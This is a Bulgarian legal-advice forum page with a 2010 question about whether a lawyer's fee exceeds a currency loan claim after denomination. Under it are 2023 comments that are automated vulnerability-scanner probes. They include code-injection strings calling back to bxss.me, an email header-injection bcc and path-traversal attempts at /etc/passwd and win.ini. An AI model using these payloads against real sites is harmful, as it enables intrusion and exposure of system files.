неправилно изчислен хонорар

11.07.2010г. 03:27:51
Здравейте, Моля да ми отговорите на следния въпрос: На 15.02.2006г.подписах Договор за правна помощ и платих възнаграждение- 3 600лв. на авокатите във връзка със завеждане на гражданско дело за събиране на дължими суми - 36 400 щ.д. и 17 400 ДМ по сключен договор за заем от 25.07. 1995г. Съгласно Договора за заем връщането на дължимите суми е следвало да стане на 25. 09. 1995г. На тази дата котировките на валутите на БНБ са били 47.73 лв. за 1 ДМ и 67.94 Щ.Д. или длъжника ми е дължал 3303518 лв. След деноминацията сумата става 3303.52лв. или при спечелване наделото бих взел по-малко от възнаграждението -3600 лв. Моля Ви да ми отговорите дали съм прав и какви са шансовете ако заведа дело. А.Господинов

Правни мнения, съвети и коментари

lxbfYeaa
05.10.2023г. 07:24
".gethostbyname(lc("hittt"."cquyztva72d50.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(68).chr(105).chr(79)."
lxbfYeaa
05.10.2023г. 07:24
to@example.com> bcc:009247.5555-63791.5555.cc922.19635.2@bxss.me
lxbfYeaa
05.10.2023г. 07:24
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
lxbfYeaa
05.10.2023г. 07:24
'+'A'.concat(70-3).concat(22*4).concat(122).concat(84).concat(97).concat(69)+(require'socket' Socket.gethostbyname('hitco'+'iwodbryc19d7d.bxss.me.')[3].to_s)+'
lxbfYeaa
05.10.2023г. 07:24
xfs.bxss.me
lxbfYeaa
05.10.2023г. 07:24
Comments
lxbfYeaa
05.10.2023г. 07:24
../../../../../../../../../../../../../../etc/passwd
lxbfYeaa
05.10.2023г. 07:24
'"
lxbfYeaa
05.10.2023г. 07:24
Comments/.
lxbfYeaa
05.10.2023г. 07:24
../../../../../../../../../../../../../../windows/win.ini

Коментар